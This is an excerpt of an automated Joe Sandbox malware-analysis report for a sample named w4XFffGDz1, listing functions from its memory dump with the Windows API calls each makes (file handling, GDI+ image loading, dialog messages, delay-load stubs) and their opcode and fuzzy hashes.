Part of subcall function 00174D8A: GetLastError.KERNEL32(?,-00000028,?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E66

FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174C9D

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorH_prolog3_Last
String ID:
API String ID: 765066492-0
Opcode ID: ebd01101126e875a1f450b0dd0ea885ec66b013cf38689aa6f021f159df9780c
Instruction ID: 00ca0ae4563b2fab597622bb991cd104b7290092a6f1b0acf270cffcc50a37bb
Opcode Fuzzy Hash: ebd01101126e875a1f450b0dd0ea885ec66b013cf38689aa6f021f159df9780c
Instruction Fuzzy Hash: E3F0A731009750ABCF221BB89904A5B7FF46F26330F04CB09F0ED026A2C730D455DB26

Function 00183F16 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00183F1D

Part of subcall function 00173650: CreateFileW.KERNELBASE(00000000,?,?,00000000,00000003,08000000,00000000,B19080A7,?,00000000,?,?,?,00000000,0019FCB8,000000FF), ref: 00173718
Part of subcall function 00173650: GetLastError.KERNEL32(?,?,00000000,0019FCB8,000000FF), ref: 0017372A
Part of subcall function 00173650: CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,?,?,00000000,0019FCB8,000000FF), ref: 00173776

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CreateFile$ErrorH_prolog3_Last
String ID:
API String ID: 4294874049-0
Opcode ID: 7e0666524157edcbc0f816e38af12c2b68f358f867ca5bb0909d3b8ac42261e9
Instruction ID: 32853f9f6a06d7f67269f90cb122c3463e9e78788520725c6bc4874a10ab73e6
Opcode Fuzzy Hash: 7e0666524157edcbc0f816e38af12c2b68f358f867ca5bb0909d3b8ac42261e9
Instruction Fuzzy Hash: 1EE0AC3591421CAADF00FB94CC95AED7335AF65704F144415BA196B192DB30AF08DBA1

Function 00185BD6 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00185BDC

Part of subcall function 00185919: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0018593A

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 478f8b8c81deb0fc53abe9f08a4f22149e6ab8492a042acd5b5e01f701b0f814
Instruction ID: f2b294c9ce3389dfa1306aa7e7cf51b6333457b524da307c5ea5161e718204f8
Opcode Fuzzy Hash: 478f8b8c81deb0fc53abe9f08a4f22149e6ab8492a042acd5b5e01f701b0f814
Instruction Fuzzy Hash: 3ED0C930650A09BADF457B659C1296E7A9BEB20354F008125BC4695191EFB2DF10AFA1

Function 0018B00B Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,0017B82D), ref: 0018B030

Part of subcall function 001875D8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001875E9
Part of subcall function 001875D8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001875FA
Part of subcall function 001875D8: IsDialogMessageW.USER32(0001048C,?), ref: 0018760E
Part of subcall function 001875D8: TranslateMessage.USER32(?), ref: 0018761C
Part of subcall function 001875D8: DispatchMessageW.USER32(?), ref: 00187626

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 18961071d808d391479318b65fb30f623fd7762ad83a32f6783324d1c96190e8
Instruction ID: e24caf8f5fdffbb2e6bd28214fb6fb6919bb715591f1e750e20c4dcbf705440d
Opcode Fuzzy Hash: 18961071d808d391479318b65fb30f623fd7762ad83a32f6783324d1c96190e8
Instruction Fuzzy Hash: 55D09E71154240AAE6022B51DD46F0E7EB6BB98B04F404554B248744F1C662DD619F06

Function 0018B79F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 48c4f49f7425030eb5a2db00d126591cdac80a5151a0c0884d90d2d55a7e8eda
Instruction ID: 85118b0a4a22c27c6bc6f1f326d593855d613b453db4045a2f5be96ece2480a7
Opcode Fuzzy Hash: 48c4f49f7425030eb5a2db00d126591cdac80a5151a0c0884d90d2d55a7e8eda
Instruction Fuzzy Hash: 72B0128525C101BD710871851D47D36114CC2E4F10338891EF015D4181D7404D4506F5

Function 0018B784 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 2d5b76acc7f124b284664012ff90d3ef35246cabd5471274d07bcdd31b0b9389
Instruction ID: e44268804e4c8dd3a8692d47eb43a37a63b56b81e30e2e3557f2762c1074fd4b
Opcode Fuzzy Hash: 2d5b76acc7f124b284664012ff90d3ef35246cabd5471274d07bcdd31b0b9389
Instruction Fuzzy Hash: 77B0128525C105BD710831411E97C36110CC2E5F14338C61FF420E408197404D4405F6

Function 0018B7BD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 4ffa274335196223ec8ec25438cfd66f24812d6cb26d3f03ad8821a642e97d2e
Instruction ID: 6d096ffb99e29f400263c66f5a2f49fdf069e3ed61d6f181e1384848f018f023
Opcode Fuzzy Hash: 4ffa274335196223ec8ec25438cfd66f24812d6cb26d3f03ad8821a642e97d2e
Instruction Fuzzy Hash: 0CB0129525C101BD7108B14A1E47D36114CC2D4F10334451EF014D4481D7404F4106B5

Function 0018B7B3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 230519ec39c62656a5e927f6cb343f6485b991fd8772282b16ea0f749ed304c1
Instruction ID: d89a00353225b4e659f88364a6192a93e76550a0e6176a19334bd8be7dc77c0c
Opcode Fuzzy Hash: 230519ec39c62656a5e927f6cb343f6485b991fd8772282b16ea0f749ed304c1
Instruction Fuzzy Hash: 33B0129525C201BD7148B1491D47D36114CC2D4F10334461EF014D4081D7404E8006B5

Function 0018B7A9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: b66d4cb5e3538677f536ca0c95b210b7c05e0a7250c6ee4b5219e1943ec0e80f
Instruction ID: 2991df464fde4f627fb007755caba15dd74462a11e2bfb6fadfd4635cf725f1a
Opcode Fuzzy Hash: b66d4cb5e3538677f536ca0c95b210b7c05e0a7250c6ee4b5219e1943ec0e80f
Instruction Fuzzy Hash: C1B0129625C101BD7108B1491D57D36114CC2D5F10334851EF414D4081D7404E4006B5

Function 0018B7DB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 3a9cc122186f5df8a551c8577d1f372624fc28746be63abc587b683ae4e20779
Instruction ID: b6a7113d6dc8ff859c1fb54662b3d60751d53171626f17b787864f37b0ab620d
Opcode Fuzzy Hash: 3a9cc122186f5df8a551c8577d1f372624fc28746be63abc587b683ae4e20779
Instruction Fuzzy Hash: 92B0129525D201BD714872451D47D36114CC2D4F14338461FF014D4081D7408D8006B5

Function 0018B7D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: b4837aed1684607df2719f0a6c1fed919eab08fd5606de1a9e1e79b8e686de46
Instruction ID: 202c4b0c5f7deea25f0eb2168b6164dd8f8020c588f2fd8c374478acc4da182f
Opcode Fuzzy Hash: b4837aed1684607df2719f0a6c1fed919eab08fd5606de1a9e1e79b8e686de46
Instruction Fuzzy Hash: C8B0128529D101BD710871451D57D36114CC2D5F14338861EF414D4081D7404D4006B5

Function 0018B7C7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 8a24726f2522152fc95865fd18308a80bce8ea94f0a2ce1c50d78742d683148f
Instruction ID: 98db0f98d0a418e3aabe059bd42bb08388a0905e57baab296a0eb6adebbd8109
Opcode Fuzzy Hash: 8a24726f2522152fc95865fd18308a80bce8ea94f0a2ce1c50d78742d683148f
Instruction Fuzzy Hash: 88B0129525C101BD7108B14A1D47D36114CC2D4F10334451EF014D4081D7404E4106B5

Function 0018B7F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: ec01218f1a9e647d119b49164d11bad828dd8b52281d519b17036e91106b90c7
Instruction ID: bfb9da1cc7d79e736553a5e1584466aded727f2d3b58dafabe7ba1cf0ee6d428
Opcode Fuzzy Hash: ec01218f1a9e647d119b49164d11bad828dd8b52281d519b17036e91106b90c7
Instruction Fuzzy Hash: 63B012C925C101BD710871551D57D36118CC2D5F10334851EF514D4081D7404D4006B5

Function 0018B7E5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: af6c0d1b3397792d0de608343c3ac8119cf1d8bc6ec9a5eb6a765f887b694779
Instruction ID: d260887935dd43da0cbe6e8b701f687be26359358fe0592f01f3f0260535bf1d
Opcode Fuzzy Hash: af6c0d1b3397792d0de608343c3ac8119cf1d8bc6ec9a5eb6a765f887b694779
Instruction Fuzzy Hash: DEB0128525E101BD710871461E47D36154CC2D4F14338451EF014D4481D7404E4106B5

Function 0018B817 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 3984ad37a0098bef13cd6de3b4cf1183b9f038491873a6da4156d073356fc623
Instruction ID: 4157f35120069220ee23148580ff8b4d5b7b3df5fafcc44b617ccadb68ab236e
Opcode Fuzzy Hash: 3984ad37a0098bef13cd6de3b4cf1183b9f038491873a6da4156d073356fc623
Instruction Fuzzy Hash: 3BB012DA25C101BD710871451D47D36118CC2D4F10334461EF014D4081D7404D4106B5

Function 0018B80D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: d4b7626c7973e163cd28b2f91cdb151c2cf38afe2a7210498e8607553cabb378
Instruction ID: 31c3a590131c588b468401b20ff2120601959816cebf8f32687b0e6e65365d08
Opcode Fuzzy Hash: d4b7626c7973e163cd28b2f91cdb151c2cf38afe2a7210498e8607553cabb378
Instruction Fuzzy Hash: ADB012D925C101BD710871461E47D3611CCC2D4F10334451EF014D4481D7404E4106B5

Function 0018B803 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0018B796

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 5661705e9ae54ae58882a1e28d3e329bcf9315783e9480ef0bbcf98e551a199a
Instruction ID: 2dbfce2f833456b5cddf9a3d8d47ee081587f44988be9cd5d7c9382f56c2b873
Opcode Fuzzy Hash: 5661705e9ae54ae58882a1e28d3e329bcf9315783e9480ef0bbcf98e551a199a
